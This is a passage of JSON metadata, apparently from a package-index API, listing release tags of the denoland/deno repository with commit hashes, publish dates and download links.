itHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms